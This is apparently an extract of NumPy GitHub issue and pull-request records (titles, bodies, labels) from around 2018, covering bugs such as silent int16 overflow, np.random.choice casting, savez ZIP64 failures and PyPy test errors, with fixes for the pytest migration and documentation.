    <t>np.einsum unexpected behavior for double trace on tensors</t>
  </si>
  <si>
    <t>I am opening this issue to discuss the desired semantics of np.random.choice, with reference to some previous issues that have brought up portions of the below. (I'm not sure if this is the most appropriate place for this type of discussion, so feel free to direct me elsewhere.)_x000D_
_x000D_
When "xs" is a python list, the semantics of "np.random.choice(xs)" depends on the types and values of the elements of xs, which is surprising because python's analogous "random.choice(xs)" does not, and because one would not expect choosing a random element from a list to depend on what the elements are. (This was mentioned in a comment on issue #8305.)_x000D_
_x000D_
One specific case of this was mentioned in issue #7810; namely, when xs is multidimensional and each of its elements can be broadcast to the same shape, e.g. xs = [[1, 2], [3, 4]]._x000D_
_x000D_
The proposal in that issue is to add an optional "axis" argument, with "axis=0" giving the desired behavior. However, this would not resolve the surprises I ran into below even when xs is one-dimensional._x000D_
_x000D_
With "xs = [1, 2]", the 1 is cast to a numpy.int64 (this led to a bug in my code)._x000D_
With "xs = [1, 2.5]", the 1 is cast to a numpy.float64._x000D_
With "xs = [10 ** 100 + 1, 2.5]", the large integer remains a python int, despite what I expected from the previous example._x000D_
With "xs = [1, [2, 3]]", the 1 remains a python int._x000D_
_x000D_
These casts (or lack thereof) occur because np.random.choice starts by creating an ndarray out of its argument, which I did not expect to happen as the function shouldn't need to inspect the elements of xs._x000D_
_x000D_
My first suggested solution would be to, instead of the cast "a = np.array(a, copy = True)" at the beginning of np.random.choice, convert "a" to a 1D array with dtype='O'. I believe this would fix #7810, without the need for an axis argument, as well as the surprises I ran into above. Unfortunately "a = np.fromiter(a, dtype = 'O')" does not accomplish this as np.fromiter cannot be used with the 'O' dtype (??), so an explicit python loop would probably be necessary for this approach (or the use of some function I am unaware of)._x000D_
_x000D_
Alternatively, and preferably, it is possible to delay the numpy array creation until the end (where it is only needed if "size" is given), but this would require modifying some of the error-checking which I didn't understand._x000D_
_x000D_
Either of the above solutions with fix the problem that led to #7810 but would be incompatible with the axis keyword being added (which only matters if axis &gt; 0 is actually useful for anything)._x000D_
_x000D_
It is not clear to me what the most obvious behavior of np.random.choice should be when the "size" argument is given. If size is a tuple it is clear the user is expecting an ndarray in response, but the dtype is not clear, e.g., if np.random.choice([1, 2.5], size = (2, 2)) returns [[1, 1], [1, 1]]._x000D_
_x000D_
Finally, it is possible that the best solution is that np.random.choice should only work predictably on inputs of consistent types and shapes. If this is the intended solution, then the above behavior I described as "surprising" should instead be more clearly documented, with the documentation pointing the user towards the use of python's random.choice for cases where the input has an unusual shape or mixed types.</t>
  </si>
  <si>
    <t>Surprising np.random.choice semantics due to unexpected casting to ndarray</t>
  </si>
  <si>
    <t xml:space="preserve">With these changes we have the following results when testing with pytest/nose on Python 2.7._x000D_
```_x000D_
numpy/linalg/tests_x000D_
    pytest -- run:121 skipped:0 slow:22_x000D_
    nose   -- run:121 skipped:0 slow:22_x000D_
numpy/testing/tests_x000D_
    pytest -- run:118 skipped:4_x000D_
    nose   -- run:122 skipped:0_x000D_
numpy/random/tests_x000D_
    pytest -- run:138 skipped:0 slow:0_x000D_
    nose   -- run:138 skipped:0 slow:0_x000D_
numpy/ma/tests_x000D_
    pytest -- run:445 skipped:2 slow:0_x000D_
    nose   -- run:445 skipped:2 slow:0_x000D_
numpy/distutils/tests_x000D_
    pytest -- run:27 skipped:0 slow:0_x000D_
    nose   -- run:27 skipped:0 slow:0_x000D_
numpy/fft/tests_x000D_
    pytest -- run:30 skipped:0 slow:0_x000D_
    nose   -- run:30 skipped:0 slow:0_x000D_
numpy/polynomial/tests_x000D_
    pytest -- run:451 skipped:0 slow:0_x000D_
    nose   -- run:451 skipped:0 slow:0_x000D_
numpy/compat/tests_x000D_
    pytest -- run:1 skipped:0_x000D_
    nose   -- run:1 skipped:0_x000D_
numpy/tests_x000D_
    pytest -- run:19 skipped:0_x000D_
    nose   -- run:19 skipped:0_x000D_
numpy/core/tests_x000D_
    pytest -- run:2004 skipped:11 slow:10_x000D_
    nose   -- run:2004 skipped:11 slow:10_x000D_
numpy/lib/tests_x000D_
    pytest -- run:1156 skipped:3 slow:5_x000D_
    nose   -- run:1156 skipped:3 slow:5_x000D_
numpy/f2py/tests_x000D_
    pytest -- run:365 skipped:0 slow:31_x000D_
    nose   -- run:365 skipped:0 slow:31_x000D_
numpy/matrixlib/tests_x000D_
    pytest -- run:50 skipped:0 slow:0_x000D_
    nose   -- run:50 skipped:0 slow:0_x000D_
```_x000D_
_x000D_
Changes_x000D_
=======_x000D_
TST: Add numpy/compat/tests_x000D_
---------------------------_x000D_
_x000D_
These tests were not included in the `setup.py` file and consequently_x000D_
not available in the installed numpy for testing._x000D_
_x000D_
TST: Do not import functions beginning `test_`._x000D_
-----------------------------------------------_x000D_
_x000D_
Avoids pytest collection time warnings._x000D_
_x000D_
_x000D_
TST: Rename some compiled c test modules_x000D_
----------------------------------------_x000D_
_x000D_
The renamed C modules provide low level functions for testing. The_x000D_
rename marks them as private functions and makes them invisible to_x000D_
pytest by default._x000D_
_x000D_
_x000D_
TST: Remove nose dependence of locale tests._x000D_
--------------------------------------------_x000D_
Add class CommaDecimalPointLocale that can be used for testing in a_x000D_
LC_NUMERIC locale where the decimal point is a comma. It functions_x000D_
either as a context manager or as a base class with setup and teardown_x000D_
methods. Both uses raise SkipTest when no suitable locale is available._x000D_
_x000D_
_x000D_
TST: Remove some nose dependences in utils.py_x000D_
---------------------------------------------_x000D_
_x000D_
The `assert_raises` and `assert_raises_regex` testing utilities were_x000D_
being imported from nose, which in turn took them from unittest_x000D_
`assertRaises` and `assertRaisesRegex`. We takeover the nose procedure_x000D_
here so that these commonly used utilities no longer have a nose_x000D_
dependence._x000D_
_x000D_
The `raises` decorator continues to have a nose dependency, but that_x000D_
only shows up when used, and NumPy does not use it. Document that and_x000D_
otherwise leave it be._x000D_
</t>
  </si>
  <si>
    <t>TST: Various fixes prior to switching to pytest</t>
  </si>
  <si>
    <t>Closes #10784</t>
  </si>
  <si>
    <t>ENH: Add "stable" option to np.sort as an alias for "mergesort".</t>
  </si>
  <si>
    <t>['01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.core']</t>
  </si>
  <si>
    <t>('van' vs 'Van')</t>
  </si>
  <si>
    <t>DOC: Fixed author name in reference to book</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I've just noticed a dangerous "silent overflow" in Numpy when used in Jupyter notebooks. I understand there were other discussions about similar silent overflows, but this has really put me on the wrong foot, and I believe there must be millions of calculations out there silently failing, and thus giving wrong results._x000D_
_x000D_
Here is a function that stretches the values of an array between a given minimum and maximum:_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
from scipy import ndimage_x000D_
_x000D_
def stretcher(a, new_min, new_max):_x000D_
    old_min = ndimage.minimum(a)_x000D_
    old_max = ndimage.maximum(a)_x000D_
    if old_min == old_max:_x000D_
        return a - old_min + new_min_x000D_
    return new_min + (a - old_min) * (new_max - new_min) / (old_max - old_min)_x000D_
```_x000D_
_x000D_
If we execute this code that stretches the values to a positive interval:_x000D_
_x000D_
```_x000D_
a = np.array([0, -182, -10, 0], np.int16)_x000D_
b = stretcher(a, new_min=np.int16(0), new_max=np.int16(182))_x000D_
print(b)_x000D_
```_x000D_
_x000D_
we get this result:_x000D_
_x000D_
`[-178.08791209    0.          172.         -178.08791209]`_x000D_
_x000D_
A very logic result! But not for earthlings like me... You see, I understand that 0 + 182 * 182 / 182 returns -178.08791209 because it is interpreted as 0 + (182 * 182) / 182 , and 182 * 182 = 33124, which is greater than the maximum that np.int16 can hold (32767). However, I would prefer the execution to fail, so that I know I must take extra measures in my code to catch such overflows._x000D_
_x000D_
Moreover, `print(b.dtype)` returns `float64`, so one would never think that 182*182 did not fit in a 64 bit float..._x000D_
_x000D_
The correct result is returned by this slightly modified statement (notice the grouping of the division operation):_x000D_
_x000D_
```_x000D_
return new_min + (a - old_min) * ((new_max - new_min) / (old_max - old_min))_x000D_
[182.   0. 172. 182.]_x000D_
```_x000D_
_x000D_
The result type is `float32` in this case (don't ask me why)._x000D_
_x000D_
The fact that `x*y/z` returns a different result than` x*(y/z)` when z is not zero (nor close to zero) and x, y, and z are quite moderate values is also a concerning issue._x000D_
_x000D_
I don't know how Numpy optimizes calculations, but when you see a division (which seems to automatically convert the result to float), you might want to convert all values from that statement to float before any operation takes place._x000D_
_x000D_
I see that if I run this:_x000D_
_x000D_
`print(np.int16(182)*np.int16(182))`_x000D_
_x000D_
in a Jupyter notebook I do get the result -32412 and a warning:_x000D_
_x000D_
```_x000D_
[path to Python here]\lib\site-packages\ipykernel\__main__.py:1: RuntimeWarning: overflow encountered in short_scalars_x000D_
  if __name__ == '__main__':_x000D_
```_x000D_
_x000D_
Currently there is no warning in Jupyter notebooks when the same operation is inside a function. It is so easy to believe that everything works fine!_x000D_
_x000D_
You may say that it's Jupyter's fault, but if the integer overflow would have caused an error, I would have seen the problem immediately in Jupyter, too._x000D_
_x000D_
You may also say that I should not work with int16, but with int32 or int64. However, I am constrained by the libraries I work with. Some of them accept only uint8, others int16, and others int32. I already do a lot of conversions back and forth. If I have to convert each time I fear an overflow may happen the code will be messy and slow. I currently cast just before feeding the data to those libraries that accept a single type of data._x000D_
_x000D_
By the way, wasn't Python supposed to automatically cast to wider range types when needed? I understand that Numpy tries to keep the type of the result unchanged if the two operands have the same type, but in this case the type will change anyway, so why imposing a constraint (resulting in an error) when the constraint is lifted automatically one step further in the same statement?_x000D_
_x000D_
I think it is more logical, useful, pythonic and correct (numerically speaking) to automatically cast to higher types when needed and either issuing a warning about such cast, or returning an extra flag indicating that the type has changed, than to return a wrong result and issue a warning about it (which disappears anyway as shown above)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Andrei_x000D_
</t>
  </si>
  <si>
    <t>Silent int overflow</t>
  </si>
  <si>
    <t>Build a numbered index for the NEP documentation.  Also perform consistency checking on NEP status flags.</t>
  </si>
  <si>
    <t>ENH: NEP index builder</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: NEP']</t>
  </si>
  <si>
    <t xml:space="preserve">`numpy.squeeze` used to take no arguments, but at some point gained an `axis` argument._x000D_
_x000D_
`numpy.squeeze(arr)` forwards to `arr.squeeze`._x000D_
_x000D_
`numpy.squeeze` therefore wants to handle both newer objects that support `arr.squeeze(axis=...)`, and also older objects that don't know about the axis argument._x000D_
_x000D_
Currently, the way it does this is:_x000D_
_x000D_
```python_x000D_
    try:_x000D_
        # First try to use the new axis= parameter_x000D_
        return squeeze(axis=axis)_x000D_
    except TypeError:_x000D_
        # For backwards compatibility_x000D_
        return squeeze()_x000D_
```_x000D_
_x000D_
This is completely wrong. It should be:_x000D_
_x000D_
```python_x000D_
    if axis is None:  # the default, and only thing supported by older classes_x000D_
        return squeeze()_x000D_
    else:_x000D_
        return squeeze(axis=axis)_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>numpy.squeeze compatibility fallback is wrong</t>
  </si>
  <si>
    <t>['00 - Bug', 'good first issue']</t>
  </si>
  <si>
    <t>This removes a few left over uses of unittest. The main changes apart_x000D_
from removal of TestCase are:_x000D_
_x000D_
* `setUp` replaced by nose and pytest compatible `setup`_x000D_
* `tearDown` replaced by nose and pytest compatible `teardown`_x000D_
* `assertRaises` replaced by `assert_raises`_x000D_
* `assertEqual` replaced by `assert_equal`_x000D_
_x000D_
The last two are in `numpy/testings/tests/test_utils.py`, so may seem a_x000D_
bit circular, but at least are limited to those two functions._x000D_
_x000D_
The use of `setup` and `teardown`, can be fixed up with the pytest_x000D_
equivalents after we have switched to pytest.</t>
  </si>
  <si>
    <t>MAINT: Remove use of unittest in NumPy tests.</t>
  </si>
  <si>
    <t>I'm getting a RuntimeError "File size unexpectedly exceeded ZIP64 limit" when using `savez` to save a few arrays to a file, the largest of which is an array of matrices each with a different number of rows (so that the top level array's dtype is object). As best I can tell, the condition used by numpy internally to decide whether or not to pass `force_zip64=True` to the zipfile open is checking if any of the arrays to be put into the archive has nbytes greater than 2^30. My array of matrices reports nbytes less than 2^30 but in reality the total number of bytes exceeds this (it's about 1.7GB). I'm using python 3.6 and numpy 1.14.2 on Ubuntu 16.04. _x000D_
_x000D_
The following code produces the error:_x000D_
```python_x000D_
test_data = np.asarray([np.random.rand(np.random.randint(50,100),4) for i in range(800000)])_x000D_
np.savez('test', test_data=test_data)_x000D_
```_x000D_
whereas changing `np.random.randint(50,100)`-&gt;`75` produces no error.</t>
  </si>
  <si>
    <t>savez fails on large array of objects</t>
  </si>
  <si>
    <t>['54 - Needs decision']</t>
  </si>
  <si>
    <t>I don't think this is documented anywhere, but I'm pretty sure module init_x000D_
functions should return NULL in order to communicate that an exception_x000D_
occurred during initialization (as is the standard Python/C API convention)._x000D_
_x000D_
It's clear from the CPython code_x000D_
[here](https://github.com/python/cpython/blob/master/Python/importdl.c#L162)_x000D_
that if you don't return NULL, the exception is swallowed and replaced with the_x000D_
message "initialization of %s raised unreported exception"._x000D_
_x000D_
Admittedly, this is only useful for people porting Numpy to new platforms where_x000D_
it is helpful to know where module initialization is failing, but it can't hurt.</t>
  </si>
  <si>
    <t>BUG: Return NULL from PyInit_* when exception is raised</t>
  </si>
  <si>
    <t>Copy of #10379._x000D_
_x000D_
Putting this up so that it can be worked on, will probably rebase, squash, and such.</t>
  </si>
  <si>
    <t>WIP, MAINT, TST: Switch NumPy testing to pytest</t>
  </si>
  <si>
    <t>MAINT: Remove the unused scalarmath getters for fmod and sqrt</t>
  </si>
  <si>
    <t>This makes them match the behavior of hex(float) and oct(float) on python 2_x000D_
_x000D_
Note that `np.float16.__hex__` still exists, which calls `np.generic.__hex__` &amp;rarr; `ndarray.__hex__` &amp;rarr; `np.float16::tp_number.nb_hex`. Unfortunately #9972 means `__hex__` and `nb_hex` are out of sync.</t>
  </si>
  <si>
    <t>BUG: Disable hex(np.floating) and oct(np.floating) on python 2</t>
  </si>
  <si>
    <t>['00 - Bug', '57 - Close?', 'component: numpy.core']</t>
  </si>
  <si>
    <t>```python_x000D_
&gt;&gt;&gt; a = np.matrix([[1,1],[1,2]])_x000D_
&gt;&gt;&gt; a_x000D_
matrix([[1, 1],_x000D_
        [1, 2]])_x000D_
&gt;&gt;&gt; b = np.array([1,2])_x000D_
&gt;&gt;&gt; b_x000D_
array([1, 2])_x000D_
&gt;&gt;&gt; np.matmul(a,b)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
RuntimeError: Iterator automatic output has an array subtype which changed the dimensions of the output_x000D_
&gt;&gt;&gt; a = a.astype(np.float64)_x000D_
&gt;&gt;&gt; a_x000D_
matrix([[ 1.,  1.],_x000D_
        [ 1.,  2.]])_x000D_
&gt;&gt;&gt; np.matmul(a,b)_x000D_
matrix([[ 3.,  5.]])_x000D_
```_x000D_
When a.dtype is np.int32, we cannot do np.matmul on a and b. But after changing the data type to np.float64, it works._x000D_
Anyone know why is that?</t>
  </si>
  <si>
    <t>BUG: np.matmul fails on np.matrix of integers</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.matrixlib']</t>
  </si>
  <si>
    <t>Fixes #10753 _x000D_
_x000D_
It turns out that (in python2 only) python's `float` type implements the `tp_print` method slot, and we inherit it in numpy float types. This is a mostly obsolete method which overrides `str` and `repr` in some situations. Its a bit of an anachronism that `float` implements it._x000D_
_x000D_
Since we now override the float str/repr in numpy (with dragon4), we should also override `tp_print`. This PR does that._x000D_
_x000D_
In case it is useful, here is the python2 doc on `tp_print`: [(link)](https://docs.python.org/2/c-api/typeobj.html#c.PyTypeObject.tp_print)_x000D_
_x000D_
This might be a candidate for putting in a 1.14.3 release, though maybe this is too small a bug for that.</t>
  </si>
  <si>
    <t>BUG: floating types should override tp_print</t>
  </si>
  <si>
    <t>Signed-off-by: Khem Raj &lt;raj.khem@gmail.com&gt;</t>
  </si>
  <si>
    <t>ENH: Add riscv support</t>
  </si>
  <si>
    <t>on python 2.7.14_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.version.full_version_x000D_
'1.14.2'_x000D_
&gt;&gt;&gt; 1 &lt;&lt; np.int32(52)_x000D_
1048576_x000D_
&gt;&gt;&gt; 1 &lt;&lt; 52_x000D_
4503599627370496L_x000D_
&gt;&gt;&gt; _x000D_
```</t>
  </si>
  <si>
    <t>numpy.int32 shift error</t>
  </si>
  <si>
    <t xml:space="preserve">Addressing issue #10682 </t>
  </si>
  <si>
    <t>MAINT: Warn that weights are not used in histogram bin edges calculation</t>
  </si>
  <si>
    <t>This changes most to the tests to run Python 3.6. Python 3.6 is a good base for the next couple of years and could use more testing and having this now makes dropping 2.7 just a little bit easier.</t>
  </si>
  <si>
    <t>TST: Change most travisci tests to Python3.6.</t>
  </si>
  <si>
    <t>The docstring says that negative_binomial() returns:_x000D_
_x000D_
    out : ndarray or scalar_x000D_
        Drawn samples from the parameterized negative binomial distribution,_x000D_
        where each sample is equal to N, the number of trials it took to_x000D_
        achieve n - 1 successes, N - (n - 1) failures, and a success on the,_x000D_
        (N + n)th trial._x000D_
_x000D_
N isn't the number of trials, it's the number of failures. The number of trials (excluding "the (N+n)th trial") is N+n-1, as in the equation in the "Notes" section. The formula N - (n - 1) is wrong too, it should be just N._x000D_
_x000D_
If the drawn sample were the number of trials, the minimum returned value would be n-1, but it plainly is not:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.random.negative_binomial(10, .99)_x000D_
0_x000D_
&gt;&gt;&gt;_x000D_
```</t>
  </si>
  <si>
    <t>Return value description in the docstring for negative_binomial is incorrect</t>
  </si>
  <si>
    <t>Removes some duplication from #10591._x000D_
_x000D_
It doesn't make sense to document this much detail in two places, and `histogram_bin_edges` seems like the better home for describing the available bin estimators.</t>
  </si>
  <si>
    <t>DOC: Move bin estimator documentation from `histogram` to `histogram_bin_edges`</t>
  </si>
  <si>
    <t>NumPy 1.14.x always uses a zero offset for strings in a structured array._x000D_
```python_x000D_
Python 2.7.13 |Anaconda 4.4.0 (64-bit)| (default, Dec 20 2016, 23:09:15)_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.version.full_version_x000D_
'1.13.3'_x000D_
&gt;&gt;&gt; s='abcdefghijkl'_x000D_
&gt;&gt;&gt; dt=(np.dtype({'f1':('S3',2),'f2':('S4',7)}))_x000D_
&gt;&gt;&gt; np.array(s, dtype=dt)_x000D_
array(('cde', 'hijk'),     &lt;&lt;== OK_x000D_
      dtype={'names':['f1','f2'], 'formats':['S3','S4'], 'offsets':[2,7], 'itemsize':11})_x000D_
```_x000D_
but:_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.version.full_version_x000D_
'1.14.2'_x000D_
&gt;&gt;&gt; s='abcdefghijkl'_x000D_
&gt;&gt;&gt; dt=(np.dtype({'f1':('S3',2),'f2':('S4',7)}))_x000D_
&gt;&gt;&gt; np.array(s, dtype=dt)_x000D_
array(('abc', 'abcd'),   &lt;&lt;== BROKEN_x000D_
      dtype={'names':['f1','f2'], 'formats':['S3','S4'], 'offsets':[2,7], 'itemsize':11})_x000D_
```</t>
  </si>
  <si>
    <t>Structured arrays with offsets not working in 1.14.2 but OK in 1.13.3</t>
  </si>
  <si>
    <t>['06 - Regression', 'component: numpy.core']</t>
  </si>
  <si>
    <t>At https://docs.scipy.org/doc/numpy/reference/generated/numpy.outer.html#numpy.outer (and probably other places),_x000D_
_x000D_
&gt; G. H. Golub and C. F. van Loan, Matrix Computations, 3rd ed., Baltimore, MD, Johns Hopkins University Press, 1996_x000D_
_x000D_
should be_x000D_
_x000D_
G. H. Golub and C. F. Van Loan, Matrix Computations, 3rd ed., Baltimore, MD, Johns Hopkins University Press, 1996</t>
  </si>
  <si>
    <t>Doc error: Author name wrong in reference to book</t>
  </si>
  <si>
    <t>['good first issue']</t>
  </si>
  <si>
    <t xml:space="preserve">With thanks to @ricardoV94 for inspiring this in https://github.com/numpy/numpy/issues/10736#issuecomment-372705469_x000D_
_x000D_
Results in_x000D_
_x000D_
![image](https://user-images.githubusercontent.com/425260/37474022-a2ea7582-282c-11e8-8c21-1f9587e59991.png)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: Add graph showing different behaviors of np.percentile</t>
  </si>
  <si>
    <t xml:space="preserve">fixes #10747 </t>
  </si>
  <si>
    <t>DOC: a.size and np.prod(a.shape) are not equivalent</t>
  </si>
  <si>
    <t>Fixes a typo in a warning message.</t>
  </si>
  <si>
    <t>MAINT: Fix typo in warning message</t>
  </si>
  <si>
    <t>This helps solve RobotLocomotion/drake#8315</t>
  </si>
  <si>
    <t>ENH: Add object loops to the comparison ufuncs</t>
  </si>
  <si>
    <t>Abstract collection classes accessed from the collections module_x000D_
have been deprecated since Python 3.3. They should be_x000D_
accessed through collections.abc. When run with Python_x000D_
3.7, the deprecation warning cause multiple tests to_x000D_
fail.</t>
  </si>
  <si>
    <t>MAINT: Import abstract classes from collections.abc</t>
  </si>
  <si>
    <t>Repost of https://github.com/nipy/nibabel/issues/609:_x000D_
On certain machines, the following code reliable hangs (never returns):_x000D_
```python_x000D_
R = np.array([[1.        , 0.        ,         np.nan],_x000D_
       [0.        , 0 ,         np.nan],_x000D_
       [ 0.        ,  0,         np.nan]])_x000D_
np.linalg.svd(R)_x000D_
```_x000D_
_x000D_
Numpy has been installed from wheel (numpy 1.14.2, Python 3.5.2):_x000D_
```_x000D_
np.show_config()_x000D_
blas_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
lapack_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
blas_opt_info:_x000D_
    language = c_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
openblas_info:_x000D_
    language = c_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_opt_info:_x000D_
    language = c_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
blis_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_lapack_info:_x000D_
    language = c_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
_x000D_
$ x86report_x000D_
x86cpu report_x000D_
-------------_x000D_
brand            : Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz_x000D_
vendor           : GenuineIntel_x000D_
model (display)  : 79_x000D_
family (display) : 6_x000D_
model            : 15_x000D_
family           : 6_x000D_
extended model   : 4_x000D_
extended family  : 0_x000D_
stepping         : 1_x000D_
processor type   : 0_x000D_
signature        : 263921_x000D_
MMX              : True_x000D_
3DNow!           : True_x000D_
SSE              : True_x000D_
SSE2             : True_x000D_
SSE3             : True_x000D_
SSSE3            : True_x000D_
SSE4.1           : True_x000D_
SSE4.2           : True_x000D_
supports AVX     : True_x000D_
supports AVX2    : True_x000D_
```_x000D_
This issue happens on all these openblas kernels:_x000D_
```_x000D_
dunnington_x000D_
penryn_x000D_
core2_x000D_
nehalem_x000D_
sandybridge_x000D_
prescott_x000D_
Haswell_x000D_
```_x000D_
/CC @matthew-brett</t>
  </si>
  <si>
    <t>np.linalg.svd hangs</t>
  </si>
  <si>
    <t>The original incentive here was to port tests from CPython for #9963_x000D_
_x000D_
Fixes #9969</t>
  </si>
  <si>
    <t>ENH: Implement `np.floating.as_integer_ratio`</t>
  </si>
  <si>
    <t>['01 - Enhancement', '54 - Needs decision', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Fixes for Python  3.7 compatibility._x000D_
_x000D_
* Fix tests in `numpy/testing/`. Python 3.7 makes the tracking of raised warnings more module local._x000D_
* Fix for changed return type of PyUnicode_AsUTF8, was `char *`, now `const char *`._x000D_
* Stop using the deprecated `PyObject_AsWriteBuffer` and `PyObject_AsReadBuffer` functions_x000D_
_x000D_
Also adds testing with Python 3.7-dev.</t>
  </si>
  <si>
    <t>MAINT, TST: Fixes for Python 3.7</t>
  </si>
  <si>
    <t>As brought up in #9327, data with very low variance will result in 0 IQR and thus 1 bin being chosen, which is not optimal._x000D_
_x000D_
In situations when the IQR is 0, using an estimator dependent on a measure of variance is not a great idea. I think we should just fall back to using a simple estimator such as sturges which is purely dependent on size and given it's use in R, is still a reasonable default to choose. I could also be prompted to choose between the rice estimator and sturges since the rice estimator will be larger for large data sizes._x000D_
_x000D_
@madphysicist suggested _x000D_
&gt;  Instead, we could modify _hist_bin_fd to check if the IQR is zero because the data is shaped unfortunately vs actually having only one value. For example, if IQR is zero, use np.unique to see how many distinct values there are and use the min/max values instead_x000D_
_x000D_
I'm not super keen on the above - I think using a standard method should do what the method intended so we're consistent with literature. Similarly, using `np.unique` is likely a fools errand since _x000D_
_x000D_
```python_x000D_
a = np.zeros(1000)_x000D_
a[:248] = -1 * np.random.random(248)_x000D_
a[751:] =  np.random.random(248)_x000D_
```_x000D_
Would have ~500 unique values and still suffer the same problem brought up in #9327. _x000D_
_x000D_
I think it's fine not being able to suggest the right number of bins for non-normal and pathological data, since this is not easy to do in a general way, and the estimators are based on some assumptions which don't hold and there should be no expectation for good performance in such situations._x000D_
_x000D_
In this case, we really want to choose the `max(fd_bins, sturges_bins)` and by doing `min(fd_bw, sturges_bw)` we are not doing that when the IQR is 0. This PR makes the behaviour consistent with the original intention._x000D_
_x000D_
Fixes #9327</t>
  </si>
  <si>
    <t>BUG: Fix histogram bins="auto" for data with little variance</t>
  </si>
  <si>
    <t>- Skip some refcount-requiring tests if sys.refcount is missing._x000D_
- Add refcheck=False to a safe .resize() call in npyio.py_x000D_
- Remove unused code in test_indexing.py</t>
  </si>
  <si>
    <t>MAINT: Fix low-hanging PyPy compatibility issues</t>
  </si>
  <si>
    <t>['03 - Maintenance', '24 - PyPy']</t>
  </si>
  <si>
    <t>Since PyPy compatibility was mentioned in the release announcement for numpy-1.14.2, here are the test errors and failures on PyPy 5.10.1 for Windows:_x000D_
_x000D_
```_x000D_
Python 3.5.3 (3f6eaa010fce, Jan 11 2018, 04:46:12)_x000D_
[PyPy 5.10.1 with MSC v.1500 32 bit] on win32_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt;&gt; import numpy_x000D_
&gt;&gt;&gt;&gt; numpy.test()_x000D_
Running unit tests for numpy_x000D_
NumPy version 1.14.2_x000D_
NumPy relaxed strides checking option: True_x000D_
NumPy is installed in x:\pypy3\site-packages\numpy_x000D_
Python version 3.5.3 (3f6eaa010fce, Jan 11 2018, 04:46:12)[PyPy 5.10.1 with MSC v.1500 32 bit]_x000D_
nose version 1.3.7_x000D_
&lt;snip&gt;_x000D_
======================================================================_x000D_
ERROR: numpy.core.tests.test_arrayprint.TestArray2String.test_refcount_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_arrayprint.py", line 396, in test_refcount_x000D_
    r1 = sys.getrefcount(a)_x000D_
AttributeError: module 'sys' has no attribute 'getrefcount'_x000D_
_x000D_
======================================================================_x000D_
ERROR: Failure: OSError (no file with expected extension)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\failure.py", line 39, in runTest_x000D_
    raise self.exc_val.with_traceback(self.tb)_x000D_
  File "x:\pypy3\site-packages\nose\loader.py", line 418, in loadTestsFromName_x000D_
    addr.filename, addr.module)_x000D_
  File "x:\pypy3\site-packages\nose\importer.py", line 47, in importFromPath_x000D_
    return self.importFromDir(dir_path, fqname)_x000D_
  File "x:\pypy3\site-packages\nose\importer.py", line 94, in importFromDir_x000D_
    mod = load_module(part_fqname, fh, filename, desc)_x000D_
  File "x:\pypy3\lib-python\3\imp.py", line 234, in load_module_x000D_
    return load_source(name, filename, file)_x000D_
  File "x:\pypy3\lib-python\3\imp.py", line 172, in load_source_x000D_
    module = _load(spec)_x000D_
  File "&lt;frozen importlib._bootstrap&gt;", line 694, in _load_x000D_
  File "&lt;frozen importlib._bootstrap&gt;", line 674, in _load_unlocked_x000D_
  File "&lt;builtin&gt;/frozen importlib._bootstrap_external", line 686, in exec_module_x000D_
  File "&lt;frozen importlib._bootstrap&gt;", line 223, in _call_with_frames_removed_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_indexing.py", line 25, in &lt;module&gt;_x000D_
    cdll = np.ctypeslib.load_library('multiarray', np.core.multiarray.__file__)_x000D_
  File "x:\pypy3\site-packages\numpy\ctypeslib.py", line 155, in load_library_x000D_
    raise OSError("no file with expected extension")_x000D_
OSError: no file with expected extension_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.core.tests.test_memmap.TestMemmap.test_filename_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 385, in tearDown_x000D_
    try_run(self.inst, ('teardown', 'tearDown'))_x000D_
  File "x:\pypy3\site-packages\nose\util.py", line 471, in try_run_x000D_
    return func()_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_memmap.py", line 30, in teardown_x000D_
    shutil.rmtree(self.tempdir)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 494, in rmtree_x000D_
    return _rmtree_unsafe(path, onerror)_x000D_
